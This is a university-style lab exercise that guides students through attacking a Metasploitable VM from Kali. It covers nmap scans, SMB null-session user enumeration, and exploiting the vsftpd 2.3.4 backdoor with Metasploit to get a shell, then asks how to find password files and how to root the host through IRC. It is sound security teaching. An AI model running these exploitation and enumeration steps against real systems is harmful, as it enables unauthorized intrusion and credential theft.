Metasploit and Basic Exploitation

Prerequisites:

  1. Kali Linux Virtual Machine
  2. Metasploitable Virtual Machine

Objectives:
The main purpose of this week’s exercise is getting started with Metasploit and understanding how to
wield it appropriately for basic exploits.

Call for Help:
Do your best to try the tasks below, if you’re confused, or need help, feel free to email or text me at any
point and I will gladly try to help you. If you’re having an Issue, chances are, other people are as well,
and I can update the instructions/comments/add content as necessary.

Tasks:
Setup

  1. You’ll need both Kali and Metasploitable Running simultaneously. We’ll be using virtual
    machines to run both Kali and Metasploitable simultaneously. This is nearly identical to an
    adversary on a local network with a vulnerable asset.
  2. For this to work correctly, your virtual machines should be set to either NAT, or private
    network. Note in a private network they will not be able to talk to the outside world.

Intro:

  1. Review the following sections from Offensive Security’s Website
    a. Introduction
    b. Metasploit Fundamentals
    c. Information Gathering
    https://www.offensive-security.com/metasploit-unleashed/
  2. Remember, your Kali virtual machine, and metasploitable virtual machines can easily be
    redownloaded if you encounter an error. Do not be afraid to experiment.

Initial Vectors:

  1. Determine the IP address of both your Kali Virtual Machine and the Metasploitable Virtual
    Machine. You will need these during the course of the exercises.
  2. Verify that you can ping from Kali to metasploitable and from metasploitable to Kali. This will
    confirm you have connectivity between both virtual machines.

Recon:

  1. Execute a nmap scan against the metasploitable.
    nmap -v -sV <IP Address of Target>
    What ports are open on the target host? What services does this imply might be available?
  2. Let’s see if we can determine the operating system of this host.
    What nmap command would we use to determine the running operating system?
    What is the running operating system of the metasploitable machine? Provide a screenshot.
  3. It looks like there’s a web server (port 80 is open), running on this host.
    What can we determine by visiting that website?
  4. Let’s try enumerating user accounts on the device using the nmap scripting engine.
    nmap -script smb-enum-users.nse -p- <IP Address of Target>
    Provide a screenshot.
  5. Rpcclient is a Linux tool used for executing client side Microsoft Remote Procedure Call
    functions.
    However, since 2020 kali has changed how some of this functionality works, if you’re running
    kali 2019 or later, please add the following line to your /etc/samba/smb.conf file under the
    global section. Note, you must be root to edit this file.
    client min protocol = NT1

A null session is a connection with a samba or SMB server that does not require authentication
with a password. No username or password is needed to set-up the connection and therefore it
is called a null session. The allowance of null sessions was enabled by default on legacy systems
but has been disabled from Windows XP SP2 and Windows Server 2003. The connection uses
port 445 which is an open port on out target host as we’ve seen in the results of the port scan.
Let’s open up a new terminal window and set up a null session with the Metasploitable 2 samba
server using the following command:
rpcclient -U “” [target IP address]
The -U option defines a null username followed by the IP address of the Metasploitable 2 VM.
You will be asked for a password, just press enter to continue:
Then let’s query using an rpcclient command querydominfo.
What does this tell you about the machine? How many users are there, how many are
available?
Next let’s see what users we can find by running the command enumdomusers
Pick a user you enumerated, what can you tell me about the user with the queryuser
<username> command?

  1. Software developers and hackers like to make repetitive functions easy, try using the
    enum4linux command on the target host
    What does command do? Be detailed.

Target/Weaponize

  1. We note that in earlier steps we identified that an FTP Server is running (on port 21). This
    appears to be a common FTP server VSFTPD.
    Read the below link, what does this tell you?
    https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor
    We’ll cover this in detail another time, but what does the code tell you in the pastebin link?
    Why is it vulnerable? Can you execute the vulnerability manually?
  2. It turns out nmap has a script to help us here.
    nmap -script ftp-vsftpd-backdoor -p 21 <IP Address of Target>
    Note: https://nmap.org/nsedoc/scripts/ftp-vsftpd-backdoor.html
  3. Maybe Metasploit has a module to handle this exploitation. Search by running search vsftpd

Deliver and Exploit!

  1. Start Metasploit by using the command msfconsole
  2. Setup to use the exploit using use exploit/unix/ftp/vsftpd_234_backdoor
  3. See what options are required using the show options command
  4. Set the rhost option using set rhost <IP Address of Target>
  5. Run the command by using run
  6. When the exploit is completed you will see a “Command shell session 1…”. Execute the
    traditional linux command whoami and sudo ifconfig
    What’s going on, what did the exploit accomplish?
  7. Recall and investigate where and how linux traditionally stores the user and password
    information, any ideas on what can be done to find the passwords?
  8. What could be done to fix this vulnerability?

Your Turn:
You should note that there is an IRC server running. Your mission is to gain root level privileges on the
virtual machine utilizing Metasploit. Good luck.
Provide a screenshot of the commands executed and the linux date/time using the date command.

Open chat
Hello 👋.
Tell me, how can I help you?